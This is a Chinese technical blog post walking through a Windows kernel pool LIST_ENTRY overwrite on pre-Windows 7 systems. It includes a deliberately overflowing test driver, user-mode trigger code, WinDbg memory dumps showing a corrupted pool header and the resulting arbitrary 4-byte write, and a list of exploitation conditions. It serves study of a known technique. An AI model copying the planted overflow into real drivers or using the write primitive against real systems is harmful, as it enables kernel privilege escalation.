KERNEL POOL LIST ENTRY OVERWRITE ATTACK

最新推荐文章于 2022-06-20 15:17:28 发布
最新推荐文章于 2022-06-20 15:17:28 发布
阅读量905 收藏
点赞数
分类专栏: 漏洞利用 文章标签: list header c null 测试 up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/7307735
版权

KERNEL POOL LISTENTRY OVERWRITE ATTACK

 

 

LIST_ENTRY OVERWRITE 原理图

 

测试代码:

Sys:
 
VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer)
{
         PVOIDpatdbuffer=NULL,patebuffer=NULL;
         KdPrint(("Nopagepool_ListEntry_Overwrite:cbin:%d cout:%d\n",cout,cout));
         patdbuffer=ExAllocatePoolWithTag(NonPagedPool,0x100,'atd');
         if(patdbuffer)
         {
                   KdPrint(("atdbuffer:0x%x\n",patdbuffer));
                   memcpy(patdbuffer,InputBuffer,cbin);//cbin 大小为0x38 刚好溢出下一个chunk poolheader
                   ExFreePoolWithTag(patdbuffer,'atd');//触发exploit
         }
 
}
 
R3:
 
UCHAR InputBuffer[0x38];
    UCHAROutputBuffer[0x38];
    memset(InputBuffer,0xBB,0x30);
    memset(&InputBuffer[0x30],0xaa,0x8);
   
    DWORD dwOutput;
 
    BOOL bRet;
    bRet =DeviceIoControl(hDevice, IOCTL_TEST1, InputBuffer, 0x38, &OutputBuffer, 0x38,&dwOutput, NULL);
    if (bRet)
    {
        printf("\n");
    }


 

 

分析过程

0: kd> db 820bd3c0         //atd tag 内存

820bd3c0  00 00 00 00 07 00 00 00-e8 2b 02 82 24 2c 0282  .........+..$,..

820bd3d0  24 2c 02 82 78 ec 57 80-00 00 00 00 66 11 927c  $,..x.W.....f..|

820bd3e0  00 00 00 00 00 00 92 7c-00 00 00 00 00 01 0000  .......|........

820bd3f0 07 00 08 0a 56 61 64 6c-97 ff 07 00 97 ff 07 00  ....Vadl........

820bd400 10 52 4c 82 00 00 00 00-00 00 00 00 01 00 40 c4  .RL...........@.

820bd410 00 00 00 00 d8 dd 07 82-50 17 10 e2 00 00 00 12  ........P.......

820bd420 00 70 f9 7f ff 7f f9 7f-00 00 00 00 00 00 00 00  .p..............

820bd430 08 00 01 00 08 2a 53 82-01 00 06 0a 56 61 64 20  .....*S.....Vad

 

 

 

0: kd> db 820bd3c0-8

820bd3b8 01 00 07 0a 64 74 61 00-00 00 00 00 07 0000 00  ....dta.........

820bd3c8 e8 2b 02 82 24 2c 02 82-24 2c 02 82 78 ec 57 80  .+..$,..$,..x.W.

820bd3d8 00 00 00 00 66 11 92 7c-00 00 00 00 00 00 92 7c  ....f..|.......|

820bd3e8 00 00 00 00 00 01 00 00-07 00 08 0a 56 61 64 6c  ............Vadl

820bd3f8 97 ff 07 00 97 ff 07 00-10 52 4c 82 00 00 00 00  .........RL.....

820bd408 00 00 00 00 01 00 40 c4-00 00 00 00 d8 dd 07 82  ......@.........

820bd418 50 17 10 e2 00 00 00 12-00 70 f9 7f ff 7f f9 7f  P........p......

820bd428 00 00 00 00 00 00 00 00-08 00 01 00 08 2a 53 82  .............*S.

 

0: kd> dt nt!_POOL_HEADER  820bd3b8

  +0x000 PreviousSize     :0y000000001 (0x1)

//前一个块的大小

  +0x000 PoolIndex        :0y0000000 (0)

//在相关联的pool 描述数组中的索引

  +0x002 BlockSize        :0y000000111 (0x7)

//(NumberOfBytes+0xF) >>3

  +0x002 PoolType         :0y0000101 (0x5)

//Free=0,Allocated=(PoolType|2)

  +0x000 Ulong1           :0xa070001

//TAG

  +0x004 ProcessBilled    :0x00617464 _EPROCESS

  +0x004 PoolTag          : 0x617464

  +0x004 AllocatorBackTraceIndex : 0x7464

  +0x006 PoolTagHash      : 0x61

 

 

从上面可以看到820bd3f0  出是下一个poolheader

0: kd> db 820bd3f0 

820bd3f0 07 00 08 0a 56 61 64 6c-97 ff 07 00 97 ff 07 00  ....Vadl........//list entry

820bd400 10 52 4c 82 00 00 00 00-00 00 00 00 01 00 40 c4  .RL...........@.

820bd410 00 00 00 00 d8 dd 07 82-50 17 10 e2 00 00 00 12  ........P.......

820bd420 00 70 f9 7f ff 7f f9 7f-00 00 00 00 00 00 00 00  .p..............

820bd430 08 00 01 00 08 2a 53 82-01 00 06 0a 56 61 64 20  .....*S.....Vad

820bd440 10 04 00 00 d7 04 00 00-a8 73 41 82 00 00 00 00  .........sA.....

820bd450 00 00 00 00 00 00 40 03-20 55 52 82 48 80 54 e1  ......@. UR.H.T.

820bd460 80 86 54 e1 00 00 00 01-06 00 14 0a 41 66 64 c3  ..T.........Afd.

 

0: kd> dt nt!_POOL_HEADER 820bd3f0 

   +0x000PreviousSize     : 0y000000111 (0x7)

   +0x000 PoolIndex        : 0y0000000 (0)

   +0x002 BlockSize        : 0y000001000 (0x8)

   +0x002 PoolType         : 0y0000101 (0x5)

  +0x000 Ulong1           :0xa080007

  +0x004 ProcessBilled    :0x6c646156 _EPROCESS

  +0x004 PoolTag          :0x6c646156

  +0x004 AllocatorBackTraceIndex : 0x6156

  +0x006 PoolTagHash      : 0x6c64

 

 

Memcpy之后

 

0: kd> db 820bd3c0

820bd3c0 bb bb bb bb bb bb bb bb-bb bb bb bb bb bb bb bb  ................

820bd3d0 bb bb bb bb bb bb bb bb-bb bb bb bb bb bb bb bb  ................

820bd3e0 bb bb bb bb bb bb bb bb-bb bb bb bb bb bb bb bb  ................

820bd3f0 aa aa aa aa aa aa aa aa- 97 ff 07 00 97 ff07 00  ....Vadl........ //覆盖了下一个poolchunk的头部

820bd400 10 52 4c 82 00 00 00 00-00 00 00 00 01 00 40 c4  .RL...........@.

820bd410 00 00 00 00 d8 dd 07 82-50 17 10 e2 00 00 00 12  ........P.......

820bd420 00 70 f9 7f ff 7f f9 7f-00 00 00 00 00 00 00 00  .p..............

820bd430 08 00 01 00 08 2a 53 82-01 00 06 0a 56 61 64 20  .....*S.....Vad

 

 

 

0: kd> dt nt!_POOL_HEADER 820bd3f0 

  +0x000 PreviousSize     :0y010101010 (0xaa)

  +0x000 PoolIndex        :0y1010101 (0x55)

  +0x002 BlockSize        :0y010101010 (0xaa)

  +0x002 PoolType         :0y1010101 (0x55)

  +0x000 Ulong1           :0xaaaaaaaa

  +0x004 ProcessBilled    :0xaaaaaaaa _EPROCESS

  +0x004 PoolTag          :0xaaaaaaaa

  +0x004 AllocatorBackTraceIndex : 0xaaaa

  +0x006 PoolTagHash      : 0xaaaa

 

 

手动将这个pool header头部改动

1: kd> ed  820bd3f0 000a0007

 

0: kd> dt nt!_POOL_HEADER 820bd3f0 

  +0x000 PreviousSize     :0y000000111 (0x7)

  +0x000 PoolIndex        :0y0000000 (0)

  +0x002 BlockSize        :0y000001010 (0xa)

  +0x002 PoolType         :0y0000000 (0) //将pooltype设置成0 标志着释放了

  +0x000 Ulong1           : 0xa0007

  +0x004 ProcessBilled    :0x6c646156 _EPROCESS

  +0x004 PoolTag          :0x6c646156

  +0x004 AllocatorBackTraceIndex : 0x6156

  +0x006 PoolTagHash      : 0x6c64

 

ExFreePoolWithTag释放时触发写任意地址任意4个字节

 

1: kd> .trap 0xffffffffb24e0704
ErrCode = 00000002
eax=820bd3b8 ebx=0007ff97 ecx=000001ffedx=820bd3f0 esi=80565d20 edi=0007ff97
eip=8054c10d esp=b24e0778 ebp=b24e07b8iopl=0         nv up ei pl nz na pe nc
cs=0008 ss=0010  ds=0023  es=0023 fs=0030  gs=0000             efl=00010206
nt!ExDeferredFreePool+0x107:
8054c10d 893b            mov     dword ptr [ebx],edi  ds:0023:0007ff97=????????
1: kd> dd 820bd3f0 
820bd3f0 000a0007 6c646156 0007ff97 0007ff97
820bd400 824c5210 00000000 00000000 c4400001
820bd410 00000000 8207ddd8 e2101750 12000000
820bd420 7ff97000 7ff97fff 00000000 00000000
820bd430 00070008 82532a08 81f95390 81fe6330
820bd440 8241e538 000004d7 00000000 821b4288
820bd450 820a16e8 03400000 82525520 e1548048
820bd460 e1548680 01000000 02140007 c3646641


 

注意事项

 

几个条件:

1 溢出后面的chunk的PreviousSize必须要等于当前chunk的blocksize(否则会引发ExFreePoolWithTag时蓝屏)

2 当前chunk的blocksize必须要大于0x20(避免释放到lookaside表上去)

3 溢出后面的chunk的pooltype必须为0(0表示该chunk被释放,引起pool 合并)

4 溢出后面的chunk的blocksize必须大于1(否则认为这不是个listentry)

 

利用的注意事项:

1 当前的chunk的blocksize最好是256到4080 字节大小

2 溢出的最小需要字节数=0x16。

3 当当前的chunk被释放时,会发生往任意地址写任意4个字节

4 win7以前系统链接的摘除是不经过检查的(free版本)

ref


BlackHat_DC_2011_Kernel Pool Exploitation onWindows 7-Slides.pdf
KernelPool.pdf.pdf
kernelpool_infiltrate2011.pdf.pdf
Windows 内核池溢出漏洞利用方法.PDF

 

instruder
关注
专栏目录
spark写hive按照partition overwrite
iKuboo
11-08 2305
刚发现spark写hive的是用overwrite后会把整个表删了,在执行插入,导致所有的partition都被删除了。期望是能按照partition去覆盖,而不是全表覆盖。研究了一下,以下方法亲测可行: 建表语句: CREATE TABLE `student_table`( `id` string, `name` string ) PARTITIONED BY ( ...
windows kernel pool
weixin_34014555的博客
06-19 207
kernel pool 基础 kernel pools 被分为 Non-Paged Pools, Paged Pools, Session Pools, etc. 被定义在POOL_TYPE 中 Non-Paged Pool 不可分页的系统内存 保证在任何时候都驻留在物理内存中 pools 的数量储存于 nt!ExpNumberOfNonPagedPools 在单处理器系统中,nt!PoolVe...
Windows kernel pool 初探(2014.12)
weixin_30407099的博客
05-02 240
Windows kernel pool 1. 简介 Kernel pool类似于Windows用户层所使用Heap,其为内核组件提供系统资源。在系统初始化的时候,内存管理模块就创建了pool。 严格的来说,pool只分为nonpaged pool和paged pool两类。 nonpaged pool: 只能常驻于物理内存地址,不能映射。(reside in physi...
06-驱动中的内存管理
ahaozi01的博客
07-16 686
常规内存分配 WDK提供了一系列内存分配函数,其中最基本的是ExAllocatePoolWithTag,函数原型如下: PVOID ExAllocatePoolWithTag (POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag); PoolType表示需要申请何种类型的内存,PoolType为POOL_TYPE枚举类型,常用的值是NonPagedPool与PagedPool;其中NonPagedPool表示非分页内存,PagedPool表示分页内存;这里
操作系统真象还原[11章]-用户进程
koutaoran4812的博客
06-20 599
本章在内核线程的基础上实现用户进程,主要区别是内核线程运行在特权级别3下,用户进程运行在特权级别0下。 Intel原生为CPU提供的多任务机制主要是LDT/TSS,关于LDT/TSS简要阐述一下,现代操作系统与本书实现的操作系统均未实现该机制。 LDT Intel官方提出LDT的目的就是为了把每个任务自己的代码、数据、栈段这些私有资源用单独的一个结构来存储,避免多任务运行时各个程序的资源混乱。但书中采用虚拟内存(平坦模型)+二级页表的机制已经天然的将各个............
下载覆盖已经存在的文件。「Downloads Overwrite Already Existing Files」-crx插件
03-20
请参阅此处的源代码:https://github.com/zach-adams/downloads-overwrite-already-existing-files我不对丢失的数据负责。这不会在覆盖之前比较文件的内容,而只是比较文件名。 支持语言:English (United States)
uboot-reserved-memory-kernel-use.tar.gz
04-17
在rockchip linux平台上实现uboot分配的一段内存空间传输到kernel使用。使用场景:uboot的大块数据可以很方便的的传输到kernel,以满足某些需要尽早使用此块内存的信息的场景。例如:uboot读取emmc分区的存储的数据。...
Font Overwrite-crx插件
04-03
【Font Overwrite-crx插件】是一款专为改善网络浏览体验设计的Chrome浏览器扩展程序,主要功能在于允许用户自定义并覆盖网站上显示的默认字体。这款插件尤其适合那些对某些特定字体(如Gulim或Comic Sans)不感兴趣...
Downloads Overwrite Already Existing Files-crx插件
04-02
https://microsoftededd.microsoft.com/addons/detail/dfnblaebmpjlokbkadgeaghajajidojj - 请参阅这里的源代码:https://github.com/zach-adams/downloads-overwrite-already-existing-files - 我对丢失/覆盖...
driver verifier查找隐藏的内存泄露BUG
lixiangminghate的专栏
10-17 3828
转自看雪论坛:http://bbs.pediy.com/showthread.php?t=186922 在原文上略作改动     verifier是微软提供的驱动测试工具,可以用来识别内存损坏、错误处理的 I/O 请求包 (IRP)、无效的直接内存访问 (DMA) 缓冲区占用、可能的死锁以及低资源模拟等情况。在开始菜单->运行中输入 verifier后,可以弹出如下菜单: 选择默认选项
ExAllocatePoolWithTag
黄少彬的专栏
02-07 2757
ExAllocatePoolWithTagThe ExAllocatePoolWithTag routine allocates pool memory of the specified type and returns a pointer to the allocated block. PVOID ExAllocatePoolWithTag( IN POOL_
[Win驱动3] Windows内核态的堆管理, LookAside,链表以及运行时函数
輚至消亡
10-08 507
内存机制简述 现代操作系统一般都有分页机制,其控制方式是通过Cr0控制寄存器中的PG位,如果PG位置位则表示分页机制开启,这种机制在还未进入保护模式时就已经确定了。在32位的CPU下,假设是4KB为一页,则4GB内存可以被分成2^20个页,并且通过页表来映射到各个进程或者磁盘上去。同一页可以映射到多个进程的虚拟内存空间中。 内核态堆空间分配 内核态中可以分配分页内存以及非分页的内存, 分页内存是CPU开启分页机制时才存在,如果没有开启分页机制,所有内存都是非分页的。 分页机制作用主要是为了给进程一个
Window XP驱动开发(二十)Window驱动的内存管理
chenyujing1234的专栏
07-21 5113
转载请标明是引用于 http://blog.csdn.net/chenyujing1234  欢迎大家拍砖!   参考书籍>    在驱动程序编写中,分配和管理内存不能使用熟知的Win32 API函数,取而代之的是DDK提供的高效的内核函数。程序员 必须小心地使用这些内存相关的内核函数,因为在内核模式下,OS不会检查内存使用的合法性。   1、 内存管理概念 1、1  物理内存概
Bypassing PatchGuard on Windows x64
07-31 550
【说明】 1.本文是意译,加之本人英文水平有限、windows底层技术属菜鸟级别,本文与原文存在一定误差,请多包涵。 2.由于内容较多,从word拷贝过来排版就乱了。故你也可以下载附件。 3.如有不明白的地方,各位雪友可通过附件中的联系方式联系我,同时建议各位参照原文阅读......【64位windows系统的PatchGuard】 原文:Bypassing P...
[翻译]内核池基础知识(池损坏)
abns44296的博客
07-23 1600
作者:huity出处:https://www.cnblogs.com/huity35/p/11232751.html版权:本文版权归作者所有。文章在博客园、看雪、个人博客同时发布。转载:欢迎转载,但未经作者同意,必须保留此段声明;必须在文章中给出原文连接;否则必究法律责任。 Part1 Buffer Overflows 池是内核模式内存,用作驱动程序的存储空间。 池的组织...
驱动开发:内存管理,防止内存泄漏
wull_的博客
09-07 359
动态申请和释放 ExFree**后,需要对指针置NULL,这样再释放之前可以判断是否为NULL来防止重复释放,否则重复释放会蓝屏 若调用了RtlAnsiStringToUnicodeString,需要使用RtlFreeUnicodeString释放 若为一段指针动态申请了一段内存,不要再直接让它指向常量,而应该使用RtlStringCbCopy类函数进行复制 特别注意在申请和释放之...
内存泄漏 - DRIVER_VERIFIER_DETECTED_VIOLATION (C4): 0x62
cqyczj的专栏
05-15 1万+
调试内存泄漏 - DRIVER_VERIFIER_DETECTED_VIOLATION (C4): 0x62 此主题尚未评级 - 评价此主题 当驱动程序上载而没有首先释放其所有池分配时,驱动程序验证程序生成 Bug Check 0xC4: DRIVER_VERIFIER_DETECTED_VIOLATION,并具有 0x62 的参数值 1。未释放的内存分配(也称为内存泄漏)
ZZ:windbg 常用命令
热门推荐
jtujtujtu的专栏
11-07 1万+
ZZ from:http://www.cppblog.com/Walker/archive/2012/06/28/146523.html 不要再假装自己写的程序没bug了,不可能的,debug工具你早晚得用上。最常见的debug工具非printf(windows上用OutputDebugString函数)莫属,简单方便易学易用,但局限性也是显而易见的,首先它对debugee的影响很大,某些r
gzip overwrite
最新发布
04-24
public void ungzip(string path, string decomPath, bool overwrite) { // for overwriting purposes if (File.Exists(decomPath) && !overwrite) { throw new Exception("File already exists and overwrite ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值